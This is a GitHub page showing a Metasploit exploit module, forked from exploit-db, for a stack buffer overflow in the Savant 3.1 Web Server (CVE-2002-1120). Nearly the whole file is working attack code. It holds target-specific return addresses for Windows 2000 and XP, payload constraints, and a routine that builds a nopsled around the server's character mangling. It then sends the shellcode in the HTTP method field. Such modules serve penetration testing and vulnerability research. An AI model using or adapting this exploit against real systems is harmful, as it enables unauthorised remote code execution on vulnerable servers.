forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path16770.rb
More file actions
executable file
·130 lines (112 loc) · 3.8 KB
/
Copy path16770.rb
File metadata and controls
executable file
·130 lines (112 loc) · 3.8 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
##
# $Id: savant_31_overflow.rb 10546 2010-10-04 20:53:51Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
HttpFingerprint = { :pattern => [ /Savant\/3\.1/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Savant 3.1 Web Server Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service
supports a maximum of 10 threads (for a default install). Each exploit attempt
generally causes a thread to die whether sucessful or not. Therefore, in a default
configuration, you only have 10 chances.
Due to the limited space available for the payload in this exploit module, use of the
"ord" payloads is recommended.
},
'Author' => [ 'patrick' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10546 $',
'References' =>
[
[ 'CVE', '2002-1120' ],
[ 'OSVDB', '9829' ],
[ 'BID', '5686' ],
[ 'URL', 'http://www.milw0rm.com/exploits/787' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 253,
'BadChars' => "\x00\x0a\x0d\x25",
'StackAdjustment' => -3500,
'Compat' =>
{
'ConnectionType' => '+ws2ord',
},
},
'Platform' => ['win'],
'Targets' =>
[
# Patrick - Tested OK 2007/08/08 : w2ksp0, w2ksp4, xpsp2 en.
[ 'Universal Savant.exe', { 'Ret' => 0x00417a96 } ], # p/r Savant.exe
[ 'Windows 2000 Pro All - English', { 'Ret' => 0x750211aa } ], # p/r ws2help.dll
[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2ac5 } ], # p/r ws2help.dll
[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa36b2 } ], # p/r ws2help.dll
[ 'Windows XP Pro SP2 - English', { 'Ret' => 0x71ab76ed } ], # p/r ws2help.dll
],
'DisclosureDate' => 'Sep 10 2002',
'DefaultTarget' => 0))
end
def check
info = http_fingerprint # check method
if info and (info =~ /Savant\/3\.1/)
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def safe_nops(count)
# We need to find a safe nop combination.
# Savant will change some chars in the http method type - anything before the "/".
#
# For example, "GET /" will remain "GET /", however
# "\xe0 /" will be modified to "\xc0 /" ...
# "\xfe /" will be modified to "\xde /" ...
# "\xff /" will be modified to "\x9f /"
# The code after the "/" - our payload - is unchanged >=)
#
# Savant bad_chars for the nops
bad_nop_chars = [*(0xe0..0xff)].pack("C*")
nopsled = make_nops(count) # make_nops includes the payload bad_chars
bad_nop_chars.each_byte { |badbyte|
nopsled.each_byte { |goodbyte|
if (goodbyte == badbyte)
return false
end
}
}
return nopsled
end
def exploit
print_status("Searching for a suitable nopsled...")
findnop = safe_nops(24) # If we use short jump or make_nops(), sled will be corrupted.
until findnop
findnop = safe_nops(24) # If nops are banned, generate a new batch.
end
print_status("Found one! Sending exploit.")
sploit = findnop + " /" + payload.encoded + [target['Ret']].pack('V')
res = send_request_raw(
{
'method' => sploit,
'uri' => '/'
}, 5)
if (res)
print_error('The server responded, that can\'t be good.')
end
handler
end
end